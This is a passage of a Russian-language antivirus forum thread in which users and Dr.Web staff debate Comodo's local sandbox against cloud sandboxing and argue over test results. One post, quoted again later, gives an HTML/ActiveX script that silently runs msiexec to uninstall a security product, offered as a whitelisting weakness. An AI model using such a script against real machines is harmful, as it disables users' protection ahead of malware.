Перейти к содержимому


Фото
- - - - -

Dr.Web и виртуализация ядра програмного кода (API)

Kernel API Virtualization Comodo

  • Please log in to reply
39 ответов в этой теме

#21 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 23 Октябрь 2021 - 15:27

Статья от Комодо менее пафосная чем вы их тут на словах передаёте :)

Вебовцы одно время помню ломали песочницу Касперского и эта песочница почему то с их антивируса потом исчезла... Постигнет ли участь Comodo стать очередной жертвой эксперимента Вебовцев или пускай живёт?)



#22 Konstantin Yudin

Konstantin Yudin

    Смотрящий

  • Dr.Web Staff
  • 19 552 Сообщений:

Отправлено 23 Октябрь 2021 - 15:33

Програмные песочницы идеальны в сферическом вакууме, в реальном мире это почти невыполнимая задача. Windows имеет очень сложный IPC (межпроцессорное взаимодействие), порой настолько не очевидный что его не реально целиком контролировать, поэтому вендоры переключились на более простой вариант, сандбоксы в облаке, где уже можно не париться о то что все пробьют. Программное решение всегда имеет НО, ограничения, нюансы, исключения и т.д. ну и дыры никто не отменял, даже контроль на уровне ядра не гарантирует что все варианты защищены, есть нюансы с ntfs, фильтрами, симлинками (это все недавние баги ос, которые нашли). Мы разрабатывали подобное программное решение, экспертиза в этом есть и у нас. Есть у нас и сандбокс в облаке, интеграцию с которым мы делаем.
With best regards, Konstantin Yudin
Doctor Web, Ltd.

#23 Konstantin Yudin

Konstantin Yudin

    Смотрящий

  • Dr.Web Staff
  • 19 552 Сообщений:

Отправлено 23 Октябрь 2021 - 15:35

Я почти уверен что для Комодо процессов есть у них исключения, на которых можно и сыграть, не удивлюсь через тот же dll hijack :) ну и баги в по никто не отменял.

Сообщение было изменено Konstantin Yudin: 23 Октябрь 2021 - 15:35

With best regards, Konstantin Yudin
Doctor Web, Ltd.

#24 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 23 Октябрь 2021 - 15:39

"Есть у нас и сандбокс в облаке, интеграцию с которым мы делаем" - хорошая новость будем ждать!)



#25 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 23 Октябрь 2021 - 15:46

Я почти уверен что для Комодо процессов есть у них исключения, на которых можно и сыграть, не удивлюсь через тот же dll hijack :) ну и баги в по никто не отменял.

Вот достойный соперник для Comodo. А то судя по ответам сотрудников Crowdstrike никто внятно предъявить комодовским акулам за эту тему так и не смог. Один нужный эксплойт минус вся философия Comodo. 



#26 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 23 Октябрь 2021 - 15:53

Один раз сюда по всему уже ломали но уязвимость пофиксили: https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67



#27 Konstantin Yudin

Konstantin Yudin

    Смотрящий

  • Dr.Web Staff
  • 19 552 Сообщений:

Отправлено 23 Октябрь 2021 - 15:54

Пробить можно любого, это даже не требует доказательств, это аксиома. Сильно сомневаюсь что если мы лично встретимся с разработчиками Комодо они будут говорить, что они не уязвимы. Так что делите бизнес, маркетинг и истинную философию и людей которые за ней стоят.
With best regards, Konstantin Yudin
Doctor Web, Ltd.

#28 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 23 Октябрь 2021 - 15:59

Пробить можно любого, это даже не требует доказательств, это аксиома. Сильно сомневаюсь что если мы лично встретимся с разработчиками Комодо они будут говорить, что они не уязвимы. Так что делите бизнес, маркетинг и истинную философию и людей которые за ней стоят.

А вот Вы говорили что "Windows имеет очень сложный IPC (межпроцессорное взаимодействие), порой настолько не очевидный что его не реально целиком контролировать, поэтому вендоры переключились на более простой вариант, сандбоксы в облаке" на Ваш взгляд зачем тогда в Comodo "надрываются" не легче ли выбрать путь остальных и иметь сандбокс в облаке?



#29 SergSG

SergSG

    The Master

  • Posters
  • 14 425 Сообщений:

Отправлено 23 Октябрь 2021 - 18:32

А вот Вы говорили что "Windows имеет очень сложный IPC (межпроцессорное взаимодействие), порой настолько не очевидный что его не реально целиком контролировать, поэтому вендоры переключились на более простой вариант, сандбоксы в облаке" на Ваш взгляд зачем тогда в Comodo "надрываются" не легче ли выбрать путь остальных и иметь сандбокс в облаке?

Ну вот как то надо ведь пропиариться. Хотя бы на время. Если сделать как у всех, никто же не поведется. А так, уже два листа исписано, хотя даже не понятно "был ли мальчик".

У всех песочниц и боксов есть один недостаток - они вяло отличают вирь-невирь. Поэтому все АВ компании и держат целый штат аналитиков.

Уход в песочницы приведет к тому, что вирь начнет маскировать код, пытаться определить среду запуска, ... Банально - ничего не мешает вирусописателю запустить свой вредоносное программное обеспечение на ПК с АВ и протестировать проскочит или нет, а потом подправить код так, чтоб проскочил, да еще и попал в белый список, если он есть. Эта задача упрощается, когда определенная территория монополизирована одним-двумя вендорами.



#30 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 24 Октябрь 2021 - 01:36

 

А вот Вы говорили что "Windows имеет очень сложный IPC (межпроцессорное взаимодействие), порой настолько не очевидный что его не реально целиком контролировать, поэтому вендоры переключились на более простой вариант, сандбоксы в облаке" на Ваш взгляд зачем тогда в Comodo "надрываются" не легче ли выбрать путь остальных и иметь сандбокс в облаке?

Ну вот как то надо ведь пропиариться. Хотя бы на время. Если сделать как у всех, никто же не поведется. А так, уже два листа исписано, хотя даже не понятно "был ли мальчик".

У всех песочниц и боксов есть один недостаток - они вяло отличают вирь-невирь. Поэтому все АВ компании и держат целый штат аналитиков.

Уход в песочницы приведет к тому, что вирь начнет маскировать код, пытаться определить среду запуска, ... Банально - ничего не мешает вирусописателю запустить свой вредоносное программное обеспечение на ПК с АВ и протестировать проскочит или нет, а потом подправить код так, чтоб проскочил, да еще и попал в белый список, если он есть. Эта задача упрощается, когда определенная территория монополизирована одним-двумя вендорами.

 

Для этого и дополняют песок другими защитными механизмами. Выше Konstantin Yudin сказал правду что много малвари, адвари и т.п. подписаны их сертификатами и то что пробить можно любого если делать это целенаправленно. Но от этого авто-песок как панацея хуже не стал если смотреть на других конкурентов. Другое дело поддерживать такую песочницу со слов Konstantinа это затратное дело поэтому другие и переключились на облачную версию песка. Тут вырисовывается такая картина - Comodo нужен авто-песок для сдерживания а для других для глубокого анализа в облаке. То есть первый делает ставку на сдерживание и лишь потом на лабораторию, вторые делают ставку на оперативность лабы... Но если совместить эти два подхода? Вначале сдерживание - локальный анализ - облачный анализ - вердикт... 

 

Вышла новость что австралийского поставщика управляемых услуг защитили от вымогателя. "Хакер взломал их текущее приложение безопасности (известный продукт) и в понедельник вечером начал атаку с помощью программы-вымогателя. К утру все системы были заражены. Резервные копии невозможно было восстановить. Все файлы были зашифрованы и не подлежали восстановлению. Все компьютеры и серверы, кроме двух, были заражены вымогателем". На этих двух стоял Comodo. Всё таки изоляция в песке до выяснения обстоятельств лучше чем вообще ничего. Этим Comodo и подкупает...

 

https://www.securitysolutionsmedia.com/2021/09/02/an-aussie-ransomware-attack-36-hours-later/



#31 maxic

maxic

    Keep yourself alive

  • Moderators
  • 12 809 Сообщений:

Отправлено 24 Октябрь 2021 - 11:08

Все компьютеры и серверы, кроме двух, были заражены вымогателем

Новость вооще ни о чем. А что стояло на остальных машинах? Найти то, что пробивает одну защиту и не справляется с другой - это и вовсе банальность. Выглядить исключительно как слабый пиар - особенно если обратить внимание на то, сколько раз в статье встречается слово Comodo. 



#32 Guest_Bellerophon_*

Guest_Bellerophon_*
  • Guests

Отправлено 24 Октябрь 2021 - 13:15

Было время, когда ... Неудачный сценарий вроде(конечно поправил, т.к.):

 

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
     
    <html>
    <head>
    <script language="JavaScript" type="text/javascript">
     
    function run()
    {
    var wshShell = new ActiveXObject("WScript.Shell");
    wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);
    }
     
    </script>
    </head>
    <input type="button" value="Lancer" onclick="run()">
    </body>
    </html>

 

запустить автоматическое удаление продукта ... Внесение в белый список - ахиллесова пята этой игрушки.



#33 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 24 Октябрь 2021 - 18:53

 

Все компьютеры и серверы, кроме двух, были заражены вымогателем

Новость вооще ни о чем. А что стояло на остальных машинах? Найти то, что пробивает одну защиту и не справляется с другой - это и вовсе банальность. Выглядить исключительно как слабый пиар - особенно если обратить внимание на то, сколько раз в статье встречается слово Comodo. 

 

Там же написано стоял известный вендор. А кто у нас известный вендор? Правильно - Касперский! :D  На вряд ли они бы написали имя вендора зачем лишняя чернуха, наверно решили разойтись мирно. Кому интересно пусть напишет им на почту с подробностями может скажут имя анти-героя. Вот в старой новостной сводке в одном из Штатов стоял Symantec и с ним частенько приходилось возиться так как инфекции, связанные с вредоносным ПО, были обычным явлением и они приняли решения заменить Symantec на Comodo. В штате Юта более 25 000 конечных точек с операционными системами Windows, Linux и Mac. Юта занимает 11-е место среди штатов США по количеству серверов с наибольшим количеством вредоносных программ. И на сегодняшний день в Юте не зарегистрировано ни одного заражения конечных точек с включенным Comodo Auto-Containment. Думаю отличный показатель работы данной технологии.

 

https://www.comodo.com/case-study/state-of-utah/



#34 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 24 Октябрь 2021 - 19:18

Было время, когда ... Неудачный сценарий вроде(конечно поправил, т.к.):

 

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
     
    <html>
    <head>
    <script language="JavaScript" type="text/javascript">
     
    function run()
    {
    var wshShell = new ActiveXObject("WScript.Shell");
    wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);
    }
     
    </script>
    </head>
    <input type="button" value="Lancer" onclick="run()">
    </body>
    </html>

 

запустить автоматическое удаление продукта ... Внесение в белый список - ахиллесова пята этой игрушки.

Думаю Вам лучше продемонстрировать эту брешь через ролик на Youtube в противном случаи это просто слух. Я сам ещё не видел случая чтобы HIPS давал возможность чему то удалить антивирус. Он как Вебовская самозащита крепко держит удар.

 

"Внесение в белый список - ахиллесова пята этой игрушки" - вообще белый список это ахиллесова пята всех игрушек. Поэтому над улучшением вердикта трудятся все вендоры. 

 

У Comodo как я понял файлы из авто-песочницы улетают на отдельную облачную-песочницу Valkyrie. И там уже проводится анализ файла. Судя по сводкам анализ проходит тщательно:

https://verdict.valkyrie.comodo.com/file/kill/chain?s=75a33287d84dc5f40a36a10394ed7295ed4c3f13- файл "Неизвестный" но уже близок к вердикту "Malware". Тип анализа делится на несколько категорий: https://verdict.valkyrie.comodo.com/file/result?s=0198d0e460bb0d9557b37bd90796279703a6de8b

 

Из старых данных говорится что облачное сканирование основано не только на хэшах:

 

Нераспознанные файлы одновременно загружаются на серверы Comodo Instant Malware Analysis для дальнейших проверок:
 
Во-первых, файлы проходят повторную антивирусную проверку на наших серверах.
 
Если сканирование обнаруживает, что файл является вредоносным (например, эвристический анализ обнаруживает, что это совершенно новый вариант), он определяется как вредоносный. Этот результат отправляется обратно в локальную установку CIS, а локальный и глобальный черный список обновляется.
 
Если сканирование не обнаруживает вредоносный файл, он переходит к следующему этапу проверки - мониторингу поведения.
 
Система анализа поведения - это облачная служба, которая помогает определить, демонстрирует ли файл вредоносное поведение. После отправки в систему неизвестный исполняемый файл будет автоматически запущен в виртуальной среде, и все действия, которые он предпринимает, будут отслеживаться. Например, будут регистрироваться созданные процессы, изменения файлов и ключей реестра, изменения состояния хоста и сетевая активность.
 
Если обнаруживается, что такое поведение является вредоносным, подпись исполняемого файла автоматически добавляется в черный список антивируса.
 
Если вредоносное поведение не зарегистрировано, файл помещается в «Нераспознанные файлы» и передается нашим техническим специалистам для дальнейшей проверки. Примечание. Анализ поведения может идентифицировать вредоносные файлы и добавлять их в глобальный черный список, но не может объявить файл «безопасным». Статус «безопасный» может быть присвоен файлу только после более тщательной проверки нашими техническими специалистами.
 
В любом случае результат будет отправлен на вашу установку Comodo Internet Security (CIS) примерно через 15 минут. Если исполняемый файл не был признан вредоносным, он будет запущен в автоматической песочнице. Он будет одновременно добавлен в список «Нераспознанные файлы» и загружен нашим техническим специалистам для анализа. Если обнаруживается, что это угроза, CIS покажет пользователю предупреждение AV. В этом предупреждении пользователь может выбрать карантин, очистить (удалить) или вылечить вредоносный файл. Эта новая угроза будет автоматически добавлена ​​в глобальную базу данных черного списка и, следовательно, принесет пользу всем пользователям CIS.
 
По факту никаких ответов через 15 минут нет тут они лукавят но суть получения билета в белый список у них такая.


#35 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 01 Ноябрь 2021 - 03:59

Вышел тест на Youtube. Мда тест откровенно сливной. Это доказывает то что локальный авто-песок защита №1 в системе и от неё уже потом пляшут остальные технологии сдерживания и нейтрализации. 

 

На мой взгляд Доктору нужно:

 

1. Решить вопрос со сканером по требованию который проводит проверку в отличие от конкурентов ну очень долго.

2. Как то уменьшить аппетиты самого антивируса чтобы он не потреблял ресурсы под 300-400мб

3. Имел возможность отсылать неизвестные файлы с уведомлением в облачную песочницу и получать ответ с последующим результатом по файлу

4. Перенял философию Comodo по нулевому доверию к неизвестному файлу с последующим перемещением его в авто-песок до вынесения вердикта

 



#36 VVS

VVS

    The Master

  • Moderators
  • 19 366 Сообщений:

Отправлено 01 Ноябрь 2021 - 07:55

COMSS... даже смотреть не буду...
Кто-нибудь, кто досмотрит до конца, расскажите, как они на этот раз подогнали под нужный результат?

Сообщение было изменено VVS: 01 Ноябрь 2021 - 08:15

меня вот что возмутило.  что даже не начинают толком диалог сразу дампы...... © alehas777
--------------------------------
Антивирус это как ремень безопасности - всего лишь увеличивает шансы выжить или получить менее тяжкую травму при аварии.
Есть, однако, категория людей, которые рассматривают средства безопасности как ауру неуязвимости. © basid


#37 Andrey32

Andrey32

    Member

  • Posters
  • 359 Сообщений:

Отправлено 01 Ноябрь 2021 - 09:01

Кто-нибудь, кто досмотрит до конца, расскажите

 

Да ничего особого, все как обычно. Очередной низкобюджетный трэш, с моими любимыми старыми актерами из 90ых (Коля, Арни там, Брюс  и Сильвестер) и т.д. Время никого не щадит :( Особо мнительным смотреть не стоит :)



#38 CCS

CCS

    Newbie

  • Posters
  • 4 Сообщений:

Отправлено 01 Ноябрь 2021 - 19:29

COMSS... даже смотреть не буду...
Кто-нибудь, кто досмотрит до конца, расскажите, как они на этот раз подогнали под нужный результат?

Эээммм как тут можно подогнать результат??? Антивирус либо обезвреживает угрозы либо пропускает другого не дано. Чем и как Доктор пытался противостоять угрозам мы видели ну а то что по напропускал говорит о том что проактивка недостаточна хороша. И чтобы решить эту проблему была и создана эта ветка с обсуждениями. Крестный отец Курилки явно пропалил фичу и уже готовит новую концепцию для нового Dr Web Genesis...


Сообщение было изменено AxelMi: 01 Ноябрь 2021 - 19:30


#39 Andrey32

Andrey32

    Member

  • Posters
  • 359 Сообщений:

Отправлено 01 Ноябрь 2021 - 19:54

готовит новую концепцию для нового Dr Web Genesis...

Да никто ничего не готовит. Движок раньше следующего лета даже ждать не стоит, не говоря обо всем остальном или новых версии. На сколько я помню как было сказано Уважаемым товарищем разработчиком,  этот год виртуализации и точка. Тесты из года в год показывают одну и ту же картину. Выйдет какой нить Петя 2, веб поймает его возможно снова первым и закроются глаза  на все эти разговоры для большей половины и слова останутся пустыми   <_<



#40 VVS

VVS

    The Master

  • Moderators
  • 19 366 Сообщений:

Отправлено 01 Ноябрь 2021 - 21:08

 

COMSS... даже смотреть не буду...
Кто-нибудь, кто досмотрит до конца, расскажите, как они на этот раз подогнали под нужный результат?

Эээммм как тут можно подогнать результат???

На этом форуме уже несколько раз обсуждались результаты "тестирования" от COMSS.

IMHO 2 варианта:

1. Эти "тестировщики" безграмотны и абсолютно не умеют тестировать.

2. Результат "тестирования этим "тестировщикам" известен до начала "тестирования".

В 1-ый вариант мне что-то не верится, так что тратить своё время и разбираться, что они там в очередной раз подшаманили, я не собираюсь.

"Единожды солгавши, кто тебе поверит?" ©


меня вот что возмутило.  что даже не начинают толком диалог сразу дампы...... © alehas777
--------------------------------
Антивирус это как ремень безопасности - всего лишь увеличивает шансы выжить или получить менее тяжкую травму при аварии.
Есть, однако, категория людей, которые рассматривают средства безопасности как ауру неуязвимости. © basid




Also tagged with one or more of these keywords: Kernel API Virtualization, Comodo

Читают тему: 1

0 пользователей, 1 гостей, 0 скрытых